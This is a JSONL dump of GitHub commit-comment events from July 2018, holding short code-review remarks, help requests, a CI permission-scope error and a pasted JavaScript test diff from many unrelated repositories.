{"id":"7920999660","type":"CommitCommentEvent","actor":{"login":"Jaiglissechef-i9100"},"repo":{"name":"7comp/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":29601466,"position":null,"line":null,"path":null,"commit_id":"162451173f905bf48b3804a88a7b7d39853f110a","created_at":"2018-07-05T05:10:29Z","updated_at":"2018-07-05T05:10:29Z","author_association":"MEMBER","body":"Nice adds but Slimrecents and Omniswitch can be displayed at the same time with their switch ^^"}},"created_at":"2018-07-05T05:10:29Z"}
{"id":"7920999820","type":"CommitCommentEvent","actor":{"login":"wjcsharp"},"repo":{"name":"xh2006/CppUtility"},"payload":{"comment":{"id":29601467,"position":3,"line":225,"path":"network/SimpleSocket.cpp","commit_id":"9cdfb78535dc689e82369f0f3383207752cea514","created_at":"2018-07-05T05:10:34Z","updated_at":"2018-07-05T05:10:34Z","author_association":"NONE","body":"We'd better Initialize the buffer here"}},"created_at":"2018-07-05T05:10:34Z"}
{"id":"7921005108","type":"CommitCommentEvent","actor":{"login":"AR98"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29601476,"position":null,"line":null,"path":null,"commit_id":"d0f2a2a6a58579d334c94d13af4b1fd3220afc96","created_at":"2018-07-05T05:12:54Z","updated_at":"2018-07-05T05:12:54Z","author_association":"NONE","body":"I did all the changes as required but my app not working well just show first main activity wen I clicked on option app crashed I cann't resolve it please help me out!!!"}},"created_at":"2018-07-05T05:12:54Z"}
{"id":"7921005485","type":"CommitCommentEvent","actor":{"login":"Jaiglissechef-i9100"},"repo":{"name":"pimpmaneaton/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":29601477,"position":null,"line":null,"path":null,"commit_id":"1161ab7774ec665ba31a53ba148fefbfbd1c284f","created_at":"2018-07-05T05:13:04Z","updated_at":"2018-07-05T05:13:04Z","author_association":"NONE","body":"Nice adds but Slimrecents and Omniswitch can be displayed at the same time with their switch ^^"}},"created_at":"2018-07-05T05:13:04Z"}
{"id":"7921007015","type":"CommitCommentEvent","actor":{"login":"VenkatGoud225"},"repo":{"name":"VenkatGoud225/GitDemo"},"payload":{"comment":{"id":29601481,"position":null,"line":null,"path":null,"commit_id":"2034cbb6e5ba786d2bc1fd032a1e1f438db1e949","created_at":"2018-07-05T05:13:47Z","updated_at":"2018-07-05T05:13:47Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-05T05:13:47Z"}
{"id":"7921007180","type":"CommitCommentEvent","actor":{"login":"varadarajanvivek"},"repo":{"name":"fastavro/fastavro"},"payload":{"comment":{"id":29601482,"position":null,"line":null,"path":null,"commit_id":"a8d27f1dcf1be1ba881e12a8eb6715d29f62f622","created_at":"2018-07-05T05:13:51Z","updated_at":"2018-07-05T05:13:51Z","author_association":"NONE","body":"what function replaces _write.write_data ?"}},"created_at":"2018-07-05T05:13:51Z"}
{"id":"7921009449","type":"CommitCommentEvent","actor":{"login":"vierfuffzig"},"repo":{"name":"ArduPilot/ardupilot_wiki"},"payload":{"comment":{"id":29601486,"position":null,"line":null,"path":null,"commit_id":"282d21e19346b30e6d2e2c13a7774277692e0172","created_at":"2018-07-05T05:14:53Z","updated_at":"2018-07-05T05:14:53Z","author_association":"CONTRIBUTOR","body":"thanks @tridge, still don‘t seem to bring it up in option hardware toctree though..."}},"created_at":"2018-07-05T05:14:53Z"}
{"id":"7921009784","type":"CommitCommentEvent","actor":{"login":"rajlilawati"},"repo":{"name":"zhiwehu/Python-programming-exercises"},"payload":{"comment":{"id":29601488,"position":52,"line":860,"path":"100+ Python challenging programming exercises.txt","commit_id":"e379474ed8ca6a830bc9c0bb1742731fa3588bd2","created_at":"2018-07-05T05:15:02Z","updated_at":"2018-07-05T05:15:02Z","author_association":"NONE","body":"` a=7**2  # 7*7`\r\nlike that \r\n`b=7**3 # cube of 7 =7*7*7 `\r\n`c=7**4 # 7*7*7*7`"}},"created_at":"2018-07-05T05:15:02Z"}
{"id":"7921011098","type":"CommitCommentEvent","actor":{"login":"hoangnam3397"},"repo":{"name":"hoangnam3397/POS_KnowhereRest"},"payload":{"comment":{"id":29601493,"position":null,"line":null,"path":null,"commit_id":"855c1cc79194f600b3c4404e58a3a3fc9fc2c898","created_at":"2018-07-05T05:15:37Z","updated_at":"2018-07-05T05:15:37Z","author_association":"OWNER","body":"create readme"}},"created_at":"2018-07-05T05:15:37Z"}
{"id":"7921018213","type":"CommitCommentEvent","actor":{"login":"nspyrison"},"repo":{"name":"nspyrison/spinifex"},"payload":{"comment":{"id":29601502,"position":null,"line":null,"path":null,"commit_id":"6ebabc2f0dcc083d839878161b53e87f9a0df76b","created_at":"2018-07-05T05:18:42Z","updated_at":"2018-07-05T05:18:42Z","author_association":"OWNER","body":"@dicook it doesn't look like inst/doc got pushed, do you have a local copy that needs to be pushed? Does spatiotemp example reside there as well?"}},"created_at":"2018-07-05T05:18:42Z"}
{"id":"7921042409","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29601542,"position":null,"line":null,"path":null,"commit_id":"da2e7ab06dcf97d3c92bca30192846a02ebc860f","created_at":"2018-07-05T05:29:20Z","updated_at":"2018-07-05T05:29:20Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180705-052919 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180705-052919\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-05T05:29:20Z"}
{"id":"7921044626","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29601550,"position":4,"line":15,"path":"lesson7/train.rb","commit_id":"79c137d3ba65b8e7ddd075f94d0a1fa16a735226","created_at":"2018-07-05T05:30:19Z","updated_at":"2018-07-05T05:30:19Z","author_association":"NONE","body":"что-то это как-то слишком хитро...\r\nочень похоже на \"костыль\" )))\r\nчто значит \"чтобы метод valid? работал\" ??"}},"created_at":"2018-07-05T05:30:19Z"}
{"id":"7921046139","type":"CommitCommentEvent","actor":{"login":"YuhangSong"},"repo":{"name":"YuhangSong/Arcade-Learning-Environment"},"payload":{"comment":{"id":29601551,"position":null,"line":null,"path":null,"commit_id":"7c6145e0f6f600cf01f0e3aab2a5ae6d626ac81c","created_at":"2018-07-05T05:30:53Z","updated_at":"2018-07-05T05:30:53Z","author_association":"OWNER","body":"use this version"}},"created_at":"2018-07-05T05:30:53Z"}
{"id":"7921047337","type":"CommitCommentEvent","actor":{"login":"zk20180228"},"repo":{"name":"zk20180228/zk20180228.github.io"},"payload":{"comment":{"id":29601554,"position":351,"line":351,"path":"线程的安全，通讯","commit_id":"28d1d2fe6e37a89a83712d8cf04c1ad017e829b8","created_at":"2018-07-05T05:31:21Z","updated_at":"2018-07-05T05:31:21Z","author_association":"OWNER","body":"会立刻，释放锁对象"}},"created_at":"2018-07-05T05:31:21Z"}
{"id":"7921048202","type":"CommitCommentEvent","actor":{"login":"YuhangSong"},"repo":{"name":"YuhangSong/test_stochasticity"},"payload":{"comment":{"id":29601556,"position":null,"line":null,"path":null,"commit_id":"646f8cacbe3de9e1e19dc08af2c805a0ae716e93","created_at":"2018-07-05T05:31:42Z","updated_at":"2018-07-05T05:31:42Z","author_association":"OWNER","body":"use this version\r\n"}},"created_at":"2018-07-05T05:31:42Z"}
{"id":"7921048850","type":"CommitCommentEvent","actor":{"login":"nhh"},"repo":{"name":"spring-projects/spring-data-mongodb"},"payload":{"comment":{"id":29601557,"position":null,"line":null,"path":null,"commit_id":"aab86d23c9eb37ef3d7db05d84327c9fe55b51d0","created_at":"2018-07-05T05:31:59Z","updated_at":"2018-07-05T05:31:59Z","author_association":"NONE","body":"In the real world, there are duplicate file-names! Why it is not possible to use the ID?"}},"created_at":"2018-07-05T05:31:59Z"}
{"id":"7921051522","type":"CommitCommentEvent","actor":{"login":"thirstyice"},"repo":{"name":"thirstyice/thirstyOS"},"payload":{"comment":{"id":29601560,"position":null,"line":null,"path":null,"commit_id":"312b456a18dd2ee737033060ce47f35d0a69951f","created_at":"2018-07-05T05:33:08Z","updated_at":"2018-07-05T05:33:08Z","author_association":"OWNER","body":"If this doesn't work, try volti"}},"created_at":"2018-07-05T05:33:08Z"}
{"id":"7921052965","type":"CommitCommentEvent","actor":{"login":"Tarek1337"},"repo":{"name":"sfirfi/Bug-Bomber-600"},"payload":{"comment":{"id":29601563,"position":22,"line":162,"path":"cogs/modlog.py","commit_id":"89445684593f7b8d705321f3e07bd5680a35c718","created_at":"2018-07-05T05:33:46Z","updated_at":"2018-07-05T05:33:46Z","author_association":"COLLABORATOR","body":"Won't work, display_name should be nick"}},"created_at":"2018-07-05T05:33:46Z"}
{"id":"7921053563","type":"CommitCommentEvent","actor":{"login":"Tarek1337"},"repo":{"name":"sfirfi/Bug-Bomber-600"},"payload":{"comment":{"id":29601566,"position":16,"line":156,"path":"cogs/modlog.py","commit_id":"89445684593f7b8d705321f3e07bd5680a35c718","created_at":"2018-07-05T05:34:01Z","updated_at":"2018-07-05T05:34:01Z","author_association":"COLLABORATOR","body":"Same here, display_name should be nick"}},"created_at":"2018-07-05T05:34:01Z"}
{"id":"7921054034","type":"CommitCommentEvent","actor":{"login":"Tarek1337"},"repo":{"name":"sfirfi/Bug-Bomber-600"},"payload":{"comment":{"id":29601567,"position":10,"line":150,"path":"cogs/modlog.py","commit_id":"89445684593f7b8d705321f3e07bd5680a35c718","created_at":"2018-07-05T05:34:12Z","updated_at":"2018-07-05T05:34:12Z","author_association":"COLLABORATOR","body":"And here, display_name should be nick"}},"created_at":"2018-07-05T05:34:12Z"}
{"id":"7921054783","type":"CommitCommentEvent","actor":{"login":"Pharap"},"repo":{"name":"eried/ArduboyCollection"},"payload":{"comment":{"id":29601568,"position":null,"line":null,"path":null,"commit_id":"e0b8d14b9234babda844068014592687e136935f","created_at":"2018-07-05T05:34:32Z","updated_at":"2018-07-05T05:34:32Z","author_association":"CONTRIBUTOR","body":"Ironically I very nearly opted for \"A curated list of {{itemCount}} games for the Arduboy\", but changed my mind.\r\nLooks like I should have gone with my original instinct."}},"created_at":"2018-07-05T05:34:32Z"}
{"id":"7921057211","type":"CommitCommentEvent","actor":{"login":"yangb2018"},"repo":{"name":"LiYiGroup/ABD.Backend"},"payload":{"comment":{"id":29601573,"position":6,"line":5,"path":"ABDService/ABDService/Controllers/ValuesController.cs","commit_id":"fa6d97b87d85b37aac97faae15a5d2461d686a3b","created_at":"2018-07-05T05:35:35Z","updated_at":"2018-07-05T05:35:35Z","author_association":"NONE","body":"为什么要删除这个？"}},"created_at":"2018-07-05T05:35:35Z"}
{"id":"7921057546","type":"CommitCommentEvent","actor":{"login":"supyaethuya"},"repo":{"name":"Khanttikyi/Finding-Team"},"payload":{"comment":{"id":29601574,"position":null,"line":null,"path":null,"commit_id":"d9fa208ecf2f9424d6a73df5c704c2c337da4fc2","created_at":"2018-07-05T05:35:43Z","updated_at":"2018-07-05T05:35:43Z","author_association":"COLLABORATOR","body":"squad hunt"}},"created_at":"2018-07-05T05:35:43Z"}
{"id":"7921058463","type":"CommitCommentEvent","actor":{"login":"rogerhu"},"repo":{"name":"dhriti04/Parsetagram"},"payload":{"comment":{"id":29601576,"position":18,"line":36,"path":"app/src/main/java/com/codepath/parsetagram/model/Post.java","commit_id":"1fd50912f933ef7d116a3d10df2a6b418d5cb5b0","created_at":"2018-07-05T05:36:07Z","updated_at":"2018-07-05T05:36:07Z","author_association":"NONE","body":"this should be findInBackground.\r\n"}},"created_at":"2018-07-05T05:36:07Z"}
{"id":"7921058819","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"collective/gatsby-source-plone"},"payload":{"comment":{"id":29601577,"position":null,"line":null,"path":null,"commit_id":"c0d4dd17217608140a79e0ba833e02c8b93dfa91","created_at":"2018-07-05T05:36:15Z","updated_at":"2018-07-05T05:36:15Z","author_association":"COLLABORATOR","body":"@ajayns FYI. Last night I fixed issues I had with `baseUrl`not ending with `/` by implementing simple path normalization (to ensure that gatsby-paths are surrounded with slashes). Once you merge master to your branch or it is merged to master, this normalization should also be included to rich text parsing code."}},"created_at":"2018-07-05T05:36:15Z"}
{"id":"7921060182","type":"CommitCommentEvent","actor":{"login":"rogerhu"},"repo":{"name":"dhriti04/Parsetagram"},"payload":{"comment":{"id":29601580,"position":17,"line":35,"path":"app/src/main/java/com/codepath/parsetagram/model/Post.java","commit_id":"1fd50912f933ef7d116a3d10df2a6b418d5cb5b0","created_at":"2018-07-05T05:36:50Z","updated_at":"2018-07-05T05:36:50Z","author_association":"NONE","body":"This function just makes getUser() performs a query for the first User object that matches the current user  What's the purpose of this code?"}},"created_at":"2018-07-05T05:36:50Z"}
{"id":"7921060513","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29601581,"position":4,"line":15,"path":"lesson7/train.rb","commit_id":"79c137d3ba65b8e7ddd075f94d0a1fa16a735226","created_at":"2018-07-05T05:36:59Z","updated_at":"2018-07-05T05:36:59Z","author_association":"NONE","body":"ну и название конечно не очень\r\nесли это метод, который валидирует, он и долежен называться `validate_uniqueness_of_id` к примеру\r\nиз твоего название неясно, что это валидация... и даже больше - оно запутывает, потому что по конвенции методы с `?` должны возвращать булево значение... а у тебя - валидация..."}},"created_at":"2018-07-05T05:36:59Z"}
{"id":"7921065075","type":"CommitCommentEvent","actor":{"login":"pjaudiomv"},"repo":{"name":"radius314/yap"},"payload":{"comment":{"id":29601588,"position":null,"line":null,"path":null,"commit_id":"2bf6cad65eb983620d916f91e97f194afb870d9b","created_at":"2018-07-05T05:38:58Z","updated_at":"2018-07-05T05:38:58Z","author_association":"CONTRIBUTOR","body":"this worked great!"}},"created_at":"2018-07-05T05:38:58Z"}
{"id":"7921066428","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29601590,"position":null,"line":null,"path":null,"commit_id":"e33b2ff23ff5eeb8264dbbd8d50377e40c733f68","created_at":"2018-07-05T05:39:30Z","updated_at":"2018-07-05T05:39:30Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/ebngqjvMStCmZYAwJrKNqA\",\n            \"queue:schedule-task:taskcluster-github/ebngqjvMStCmZYAwJrKNqA/ebngqjvMStCmZYAwJrKNqA\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/ebngqjvMStCmZYAwJrKNqA\",\n                \"queue:schedule-task:taskcluster-github/ebngqjvMStCmZYAwJrKNqA/ebngqjvMStCmZYAwJrKNqA\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-05T05:39:29.976Z\n\n</details>"}},"created_at":"2018-07-05T05:39:30Z"}
{"id":"7921071476","type":"CommitCommentEvent","actor":{"login":"opnay"},"repo":{"name":"opnay/Todo"},"payload":{"comment":{"id":29601600,"position":null,"line":null,"path":null,"commit_id":"ea029c9da04bea81eb19048b264d19b2284d7406","created_at":"2018-07-05T05:41:32Z","updated_at":"2018-07-05T05:41:32Z","author_association":"OWNER","body":"Before this commit has occur crash, when there's nothing data.(at first time)"}},"created_at":"2018-07-05T05:41:32Z"}
{"id":"7921072546","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29601608,"position":21,"line":21,"path":"Vidly/ViewModels/MovieFormViewModel.cs","commit_id":"93f39efe3ef0ce9c25ef09ebef60ad2dfc1fe7f3","created_at":"2018-07-05T05:41:59Z","updated_at":"2018-07-05T05:41:59Z","author_association":"NONE","body":"@NelsonMedinaSilva I also think it's a security precaution. If you have sensitive properties like AdminId or Id, you don't want users modifying them. From my experience, it's also just good practice. By using view models, we only need to change the mapping between our domain model and our view model if something changes."}},"created_at":"2018-07-05T05:41:59Z"}
{"id":"7921076457","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29601617,"position":5,"line":3464,"path":"src/gui/optionsdialog.ui","commit_id":"a92344ade4dec2ca3f71c5efba20e8a4c42fc8ab","created_at":"2018-07-05T05:43:39Z","updated_at":"2018-07-05T05:43:39Z","author_association":"MEMBER","body":"IIRC I need to scale icons for high DPI, so all loading of icons is handled in cpp file."}},"created_at":"2018-07-05T05:43:39Z"}
{"id":"7921080601","type":"CommitCommentEvent","actor":{"login":"gj86"},"repo":{"name":"Jprimero15/lolz_kernel"},"payload":{"comment":{"id":29601626,"position":null,"line":null,"path":null,"commit_id":"8f6b2eb0ac5120ed189a032923453d7c50b35e10","created_at":"2018-07-05T05:45:18Z","updated_at":"2018-07-05T05:45:18Z","author_association":"CONTRIBUTOR","body":"You must apply this subsequent commits to fix the erroneous crate conversion and differentiating charging and discharging current rate.\r\n\r\n1st: [fdd2ac5aa4f642760eb719bde4089a3eb0169cee](https://github.com/gj86/synergy/commit/fdd2ac5aa4f642760eb719bde4089a3eb0169cee#diff-5c0ae784d7905c65ef5fb3934f0eb363)\r\n2nd: [be83a93772d6725548987eb0c07ef7c0a729e619](https://github.com/gj86/synergy/commit/be83a93772d6725548987eb0c07ef7c0a729e619#diff-5c0ae784d7905c65ef5fb3934f0eb363)"}},"created_at":"2018-07-05T05:45:18Z"}
{"id":"7921081370","type":"CommitCommentEvent","actor":{"login":"Gear61"},"repo":{"name":"lifalzarano/TaskManager"},"payload":{"comment":{"id":29601627,"position":null,"line":null,"path":null,"commit_id":"65efa5bfb8ece00efa771d51ec4a8580282c2b20","created_at":"2018-07-05T05:45:37Z","updated_at":"2018-07-05T05:45:37Z","author_association":"COLLABORATOR","body":"![kipmapg](https://user-images.githubusercontent.com/1650117/42304609-f525ce62-7fdb-11e8-9739-319f9a96843a.gif)\r\n"}},"created_at":"2018-07-05T05:45:37Z"}
{"id":"7921084993","type":"CommitCommentEvent","actor":{"login":"Jagadish1994"},"repo":{"name":"EddyVerbruggen/SocialSharing-PhoneGap-Plugin"},"payload":{"comment":{"id":29601637,"position":3,"line":164,"path":"tests/test.js","commit_id":"c4fc2cea67f8040328c4626773b13b0fd5d98a2c","created_at":"2018-07-05T05:47:07Z","updated_at":"2018-07-05T05:47:07Z","author_association":"NONE","body":" describe('navigator.share', function() {\r\n+      it('navigator should have a `share` method that returns a promise', function() {\r\n+        expect(navigator.share).toBeDefined();\r\n+        expect(typeof navigator.share).toBe('function');\r\n+      });\r\n+    });\r\n+\r\n+    describe('share should return a promise ', function(){\r\n+    \tit ('share should return a promise', function(){\r\n+    \t\tvar dict = {\r\n+    \t\t  title: 'sample title',\r\n+          text: 'sample text',\r\n+  \t\t\t  url: 'sample url'\r\n+  \t\t\t};\r\n+\r\n+        try {\r\n+          var promise = navigator.share(dict);\r\n+        \texpect(promise).toBeDefined();\r\n+          expect(typeof promise.then).toBe('function');\r\n+          promise.then(function() {\r\n+            done();\r\n+          }, function(err) {\r\n+            expect(err).toBeDefined();\r\n+            fail(err);\r\n+            done();\r\n+          });\r\n+        } catch (err) {\r\n+          fail(err);\r\n+          done();\r\n+        }\r\n+      });\r\n+\r\n+      it ('share should resolve with only text', function(){\r\n+      \tvar dict = {\r\n+      \t  text: 'sample text'\r\n+    \t\t};\r\n+\r\n+        try {\r\n+          var promise = navigator.share(dict);\r\n+      \t\texpect(promise).toBeDefined();\r\n+          expect(typeof promise.then).toBe('function');\r\n+          promise.then(function() {\r\n+            done();\r\n+          }, function(err) {\r\n+            expect(err).toBeDefined();\r\n+            fail(err);\r\n+            done();\r\n+          });\r\n+        } catch (err) {\r\n+          fail(err);\r\n+          done();\r\n+        }\r\n+      });\r\n+\r\n+      it ('share should resolve with only a url', function(){\r\n+      \tvar dict = {\r\n+          url: 'sample title'\r\n+        };\r\n+\r\n+        try {\r\n+          var promise = navigator.share(dict);\r\n+      \t\texpect(promise).toBeDefined();\r\n+          expect(typeof promise.then).toBe('function');\r\n+          promise.then(function() {\r\n+            done();\r\n+          }, function(err) {\r\n+            expect(err).toBeDefined();\r\n+            fail(err);\r\n+            done();\r\n+          });\r\n+        } catch (err) {\r\n+          fail(err);\r\n+          done();\r\n+        }\r\n+      });\r\n+\r\n+      it ('share should resolve with only a title', function(){\r\n+      \tvar dict = {\r\n+      \t  title: 'sample title'\r\n+    \t\t};\r\n+\r\n+        try {\r\n+          var promise = navigator.share(dict);\r\n+      \t\texpect(promise).toBeDefined();\r\n+          expect(typeof promise.then).toBe('function');\r\n+          promise.then(function() {\r\n+            done();\r\n+          }, function(err) {\r\n+            expect(err).toBeDefined();\r\n+            fail(err);\r\n+            done();\r\n+          });\r\n+        } catch (err) {\r\n+          fail(err);\r\n+          done();\r\n+        }\r\n+      });\r\n+\r\n+      it ('share should reject an empty options', function(){\r\n+        try {\r\n+          var promise = navigator.share({});\r\n+      \t\texpect(promise).toBeDefined();\r\n+          expect(typeof promise.then).toBe('function');\r\n+          promise.then(function() {\r\n+            fail('something in options should be set');\r\n+            done();\r\n+          }, function(err) {\r\n+            expect(err).toBeDefined();\r\n+            done();\r\n+          });\r\n+        } catch (err) {\r\n+          fail(err);\r\n+          done();\r\n+        }\r\n+      });\r\n+\r\n+      it ('share should reject an undefined options', function(){\r\n+        try {\r\n+          var promise = navigator.share();\r\n+      \t\texpect(promise).toBeDefined();\r\n+          expect(typeof promise.then).toBe('function');\r\n+          promise.then(function() {\r\n+            fail('options should not be undefined');\r\n+            done();\r\n+          }, function(err) {\r\n+            expect(err).toBeDefined();\r\n+            done();\r\n+          });\r\n+        } catch (err) {\r\n+          fail(err);\r\n+          done();\r\n+        }\r\n+      });\r\n+    });"}},"created_at":"2018-07-05T05:47:07Z"}
{"id":"7921085141","type":"CommitCommentEvent","actor":{"login":"dominikvitt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29601638,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-05T05:47:09Z","updated_at":"2018-07-05T05:47:09Z","author_association":"CONTRIBUTOR","body":"Other fix isn't needed.\nImport works without errors and all subquestions are loaded. Would check if activation work, but it should.\n\nNa 4. srp 2018. 20:36,kod 20:36, \"Olle Härstedt\" <notifications@github.com> je napisao/la:\n>Hm, what happened to the other fix for ranking question? Does import\n>and activate survey work?\n>\n>-- \n>You are receiving this because you authored the thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/LimeSurvey/LimeSurvey/commit/00990367a1e06dd0a4773c9a48f1c820f9c456bc#commitcomment-29598664\n"}},"created_at":"2018-07-05T05:47:09Z"}
{"id":"7921087532","type":"CommitCommentEvent","actor":{"login":"xiaoqizh"},"repo":{"name":"xiaoqizh/sparkStreaming_log_process"},"payload":{"comment":{"id":29601641,"position":null,"line":null,"path":null,"commit_id":"e294d2f85585b2fc336901f3f8e41bc9110de7f5","created_at":"2018-07-05T05:48:06Z","updated_at":"2018-07-05T05:48:06Z","author_association":"OWNER","body":"for produce log"}},"created_at":"2018-07-05T05:48:06Z"}
{"id":"7921089284","type":"CommitCommentEvent","actor":{"login":"sierdzio"},"repo":{"name":"spelle/obfuscator"},"payload":{"comment":{"id":29601642,"position":null,"line":null,"path":null,"commit_id":"571624df82aaa4a3a3571e30db2dd231047c6e32","created_at":"2018-07-05T05:48:47Z","updated_at":"2018-07-05T05:48:47Z","author_association":"NONE","body":"Thanks for info, and thanks for your continuing effort. This is great! I'll surely check it out when I find some time - right now I'm flooded with other tasks unfortunately.\r\n\r\n> However when asking for a -O2 or -O3, the string si no more encrypted.\r\n\r\nHm that's worrying. Using optimisation is pretty much the norm."}},"created_at":"2018-07-05T05:48:47Z"}
{"id":"7921093715","type":"CommitCommentEvent","actor":{"login":"del-db-run"},"repo":{"name":"del-db-run/TCP-fromaliwechart"},"payload":{"comment":{"id":29601646,"position":null,"line":null,"path":null,"commit_id":"82b675541df6cbdea6184ba7a52950e93cbddf09","created_at":"2018-07-05T05:50:30Z","updated_at":"2018-07-05T05:50:30Z","author_association":"OWNER","body":"问题描述\r\n\r\n场景：JAVA的client和server，使用socket通信。server使用NIO。\r\n\r\n1.间歇性得出现client向server建立连接三次握手已经完成，但server的selector没有响应到这连接。\r\n2.出问题的时间点，会同时有很多连接出现这个问题。\r\n3.selector没有销毁重建，一直用的都是一个。\r\n4.程序刚启动的时候必会出现一些，之后会间歇性出现。\r\n分析问题\r\n\r\n正常TCP建连接三次握手过程：\r\n\r\n\r\n\r\n第一步：client 发送 syn 到server 发起握手；\r\n第二步：server 收到 syn后回复syn+ack给client；\r\n第三步：client 收到syn+ack后，回复server一个ack表示收到了server的syn+ack（此时client的56911端口的连接已经是established）。\r\n\r\n \r\n\r\n从问题的描述来看，有点像TCP建连接的时候全连接队列（accept队列，后面具体讲）满了，尤其是症状2、4. 为了证明是这个原因，马上通过 netstat -s | egrep \"listen\" 去看队列的溢出统计数据：    "}},"created_at":"2018-07-05T05:50:30Z"}
{"id":"7921095135","type":"CommitCommentEvent","actor":{"login":"norhh"},"repo":{"name":"ConsenSys/mythril"},"payload":{"comment":{"id":29601649,"position":118,"line":118,"path":"mythril/laser/ethereum/call.py","commit_id":"631ebe07b7d5de30453775c0a3fbfdf0ff12edba","created_at":"2018-07-05T05:51:01Z","updated_at":"2018-07-05T05:51:01Z","author_association":"COLLABORATOR","body":"there should be a return here right? "}},"created_at":"2018-07-05T05:51:01Z"}
{"id":"7921095511","type":"CommitCommentEvent","actor":{"login":"del-db-run"},"repo":{"name":"del-db-run/TCP-fromaliwechart"},"payload":{"comment":{"id":29601650,"position":null,"line":null,"path":null,"commit_id":"82b675541df6cbdea6184ba7a52950e93cbddf09","created_at":"2018-07-05T05:51:10Z","updated_at":"2018-07-05T05:51:10Z","author_association":"OWNER","body":"测试"}},"created_at":"2018-07-05T05:51:10Z"}
